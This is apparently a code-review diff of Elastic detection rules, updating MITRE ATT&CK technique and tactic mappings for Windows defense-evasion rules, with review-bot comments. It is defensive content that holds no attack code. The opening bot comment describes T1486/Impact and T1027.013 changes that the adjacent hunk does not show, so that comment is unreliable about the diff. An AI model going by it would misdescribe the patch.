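Review bot: The new `[[rule.threat]]` entry maps this rule to `T1486` (Data Encrypted for Impact) under the Impact tactic, which labels any PowerShell script that merely calls encryption APIs as a ransomware indicator; going by the file name and the existing T1027/T1140 mapping the detection keys on encryption primitives in script content, not on bulk file encryption, so T1486 over-claims and would route these alerts into Impact coverage and triage paths where they do not belong. The added `T1027.013` (Encrypted/Encoded File) already captures the obfuscation intent. Recommend dropping the Impact block (`id = "TA0040"` / `name = "Impact"` together with its T1486 technique), or, if the query genuinely targets mass-encryption routines, saying so in the rule description. If it is kept, `"Tactic: Impact"` must also be added to `tags` outside this hunk.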
@@ -142,40 +142,44 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation.toml b/rules/windows/defense_evasion_posh_obfuscation.toml index 3f18767f36a..ad0f576c648 100644 --- a/rules/windows/defense_evasion_posh_obfuscation.toml +++ b/rules/windows/defense_evasion_posh_obfuscation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/03" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -122,36 +122,41 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml index 98b2aa03bc7..593600d7510 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -167,39 +167,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml index 8f1bd286cb1..5b4f541efd4 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -151,39 +151,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml index c138be71ed7..c13cd36baa5 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -134,39 +134,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml index 4b1409da8c8..3d73602c1e0 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -161,39 +161,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml index 9f3f14ce734..b9785e0c3fd 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -147,39 +147,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml index 68743a18154..1a012eb642f 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -149,39 +149,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml index 7ee84b163a3..fd336eafceb 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -163,39 +163,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml index f876139f3e3..13a9aad74ba 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -144,39 +144,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml index c8686112bee..665b435f5a8 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -153,39 +153,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml index ef57939e469..2dbcf2f1a43 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -152,39 +152,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml index c92ccaac12b..43d8fd31d03 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/03" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -174,39 +174,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml index eea41de377c..b681c674f4d 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -167,39 +167,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_process_injection.toml b/rules/windows/defense_evasion_posh_process_injection.toml index 26f4689951f..5d9f0f7e6d4 100644 --- a/rules/windows/defense_evasion_posh_process_injection.toml +++ b/rules/windows/defense_evasion_posh_process_injection.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -139,10 +139,12 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.001" name = "Dynamic-link Library Injection" @@ -153,35 +155,38 @@ id = "T1055.002" name = "Portable Executable Injection" reference = "https://attack.mitre.org/techniques/T1055/002/" - +[[rule.threat.technique.subtechnique]] +id = "T1055.004" +name = "Asynchronous Procedure Call" +reference = "https://attack.mitre.org/techniques/T1055/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_proxy_execution_via_msdt.toml b/rules/windows/defense_evasion_proxy_execution_via_msdt.toml index 0bb678f64c1..f388d537933 100644 --- a/rules/windows/defense_evasion_proxy_execution_via_msdt.toml +++ b/rules/windows/defense_evasion_proxy_execution_via_msdt.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/31" integration = ["endpoint", "windows", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -110,14 +110,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml index d3516cd5119..74bb37e8196 100644 --- a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml +++ b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
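Review bot: The new `[[rule.threat]]` entry for tactic `Execution` (TA0002) in defense_evasion_proxy_execution_via_msdt.toml is not matched by any change to the rule's `tags`, which live in the `[rule]` section outside this hunk; the only other hunk for this file in the visible patch is the `updated_date` bump. Unless a `Tactic: Execution` tag is already present there, the threat mapping and the `Tactic:` tags now disagree, which is what a tactic/tag consistency check would flag; the fix is one added entry in that tag list, e.g. `"Tactic: Execution",`. The same applies to the tactics introduced in defense_evasion_regmod_remotemonologue.toml (Persistence), defense_evasion_script_via_html_app.toml (Execution), defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml (Impact), defense_evasion_suspicious_certutil_commands.toml (Command and Control, Credential Access), defense_evasion_suspicious_managedcode_host_process.toml (Execution), defense_evasion_suspicious_scrobj_load.toml (Execution), defense_evasion_system_critical_proc_abnormal_file_activity.toml (Privilege Escalation) and defense_evasion_unusual_network_connection_via_dllhost.toml (Command and Control), none of which has a tags hunk in the visible patch.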
@@ -94,31 +94,36 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/defense_evasion_regmod_remotemonologue.toml b/rules/windows/defense_evasion_regmod_remotemonologue.toml index 7aba4b1f611..8bf18cae23b 100644 --- a/rules/windows/defense_evasion_regmod_remotemonologue.toml +++ b/rules/windows/defense_evasion_regmod_remotemonologue.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2025/09/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,7 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" 
@@ -128,9 +129,25 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.015" +name = "Component Object Model Hijacking" +reference = "https://attack.mitre.org/techniques/T1546/015/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/defense_evasion_sccm_scnotification_dll.toml b/rules/windows/defense_evasion_sccm_scnotification_dll.toml index 2e9bde60d3e..9091ea5c386 100644 --- a/rules/windows/defense_evasion_sccm_scnotification_dll.toml +++ b/rules/windows/defense_evasion_sccm_scnotification_dll.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -74,14 +74,18 @@ CcmExec, part of Microsoft's System Center Configuration Manager, manages client [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = 